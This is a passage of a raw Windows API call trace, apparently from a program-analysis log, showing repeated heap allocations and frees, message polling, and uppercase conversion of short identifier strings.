(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0212.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0212.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0212.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0212.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x131b0) returned 0x2a8a138 [0212.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0212.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0212.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0212.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0212.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0212.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0212.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0212.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0212.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0212.675] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0212.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0212.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x131b0) returned 0x2a8a138 [0212.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71d48 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0212.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71c18 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0212.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71c58 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0212.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab260 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0212.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0212.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0212.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0212.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x131b0) returned 0x2ac1a30 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0212.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0212.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0212.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0212.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0212.679] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0212.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0212.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0212.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0212.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0212.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0212.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0212.679] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0212.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0212.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0212.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0212.679] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0212.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0212.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0212.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0212.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0212.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0212.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0212.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0212.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0212.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0212.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0212.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0212.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0212.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0212.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0212.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0212.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0212.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0212.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0212.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0212.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0212.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0212.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0212.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0212.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0212.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0212.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0212.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0212.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0212.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0212.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0212.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0212.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0212.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0212.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0212.683] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0212.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab320 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0212.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0212.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0212.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0212.684] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0212.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0212.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0212.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0212.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0212.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0212.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0212.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0212.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0212.684] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0212.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab608 [0212.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854b78 [0212.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0212.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0212.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0212.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0212.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0212.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0212.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0212.685] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0212.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0212.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0212.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0212.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0212.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0212.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0212.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0212.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0212.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0212.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.686] HeapFree (in: hHeap=0x2af0000, 